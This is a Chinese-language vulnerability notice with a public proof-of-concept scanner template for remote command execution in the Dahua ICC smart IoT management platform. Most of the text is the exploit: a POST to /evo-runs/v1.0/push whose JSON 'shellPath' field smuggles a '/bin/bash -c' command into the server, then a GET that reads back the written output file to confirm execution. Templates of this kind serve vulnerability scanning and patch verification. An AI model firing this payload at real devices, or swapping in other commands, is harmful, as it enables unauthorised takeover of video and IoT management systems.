漏洞描述
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。该系统存在任意文件读取漏洞,会造成敏感信息泄露。大华智能物联管理平台evo-runs/v1.0/push和evo-runs/v1.0/receive接口存在远程命令执行漏洞
dahua-zhinengwulian-evo-runsv1-0push-rce: 大华智能物联管理平台evo-runs/v1.0/push接口存在远程命令执行漏洞
PoC代码[已公开]
id: dahua-zhinengwulian-evo-runsv1-0push-rce
info:
name: 大华智能物联管理平台evo-runs/v1.0/push接口存在远程命令执行漏洞
author: avic123
severity: critical
verified: true
description: |
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。该系统存在任意文件读取漏洞,会造成敏感信息泄露。大华智能物联管理平台evo-runs/v1.0/push和evo-runs/v1.0/receive接口存在远程命令执行漏洞
reference:
- https://cn-sec.com/archives/4357593.html
tags: dahua,rce
created: 2025/08/18
set:
hostname: request.url.host
randstr: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /evo-runs/v1.0/push
headers:
Content-Type: application/json
X-Subject-Headerflag: ADAPT
body: |
{ "method": "agent.ossm.mapping.config", "info": { "configure": "abcd", "filePath": "haha", "paramMap": { "shellPath": "/bin/bash -c id>/opt/evoWpms/static/{{randstr}}.txt", "filePath": "abc" }, "requestIp": "" } }
expression: >-
response.status == 200 && response.raw.bcontains(b"success") && response.raw.bcontains(b"true")
r1:
request:
method: GET
path: /static/{{randstr}}.txt
expression: >-
response.status == 200 &&
"((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw)
expression: r0() && r1()